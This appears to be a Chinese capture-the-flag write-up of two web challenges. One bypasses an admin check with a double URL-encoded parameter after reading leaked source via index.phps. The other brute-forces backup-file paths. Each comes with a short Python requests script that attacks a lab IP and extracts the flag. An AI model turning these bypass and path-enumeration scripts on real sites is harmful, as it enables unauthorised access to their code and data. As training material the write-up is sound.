打开题目场景,得到如下界面
法一:
在url后面添加index.phps发现代码泄露,查看网页源码,审计代码,首先不能admin等于get传过来的值,又要使admin等于get传值在get传值之前有一个urldecode函数构造payload,得到flag
法二:python脚本编写
import requests
from urllib.parse import quote
url='http://61.147.171.105:52593/index.php?id='
encoded_id=''.join('%'+hex(ord(c))[2:] for c in 'admin')
encoded_id2=''. join('%'+hex(ord(c))[2:] for c in encoded_id)
target_url =url + encoded_id2
print(target_url)
response = requests.get(target_url)
if 'cyberpeace{' in response.text:
flag_start=response.text.index("cyberpeace{")
key_end =response.text.index('}',flag_start)+1
flag=response.text[flag_start:key_end]
print("存在 flag:"+flag)
else:
print("未找到 flag")
打开题目场景得到如下界面:
法一:常见的备份文件后缀名有: .git .svn .swp .svn .~ .bak .bash_history,逐个试发flag
法二:编写python脚本
import requests
url = 'http://61.147.171.105:49902/'
dictionary = 'php.txt'
with open(dictionary, "r") as file:
paths = file.read().splitlines()
for path in paths:
target_url = url + path
response = requests.get(target_url)
if"Cyberpeace{"in response.text:
flag_start=response.text.index("Cyberpeace")
flag_end = response.text.index('}', flag_start) + 1
flag = response.text[flag_start:flag_end]
print("路径爆破成功:"+target_url)
print("flag:" + flag)
break
else:
print("路径爆破失败,未找到flag")
170
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
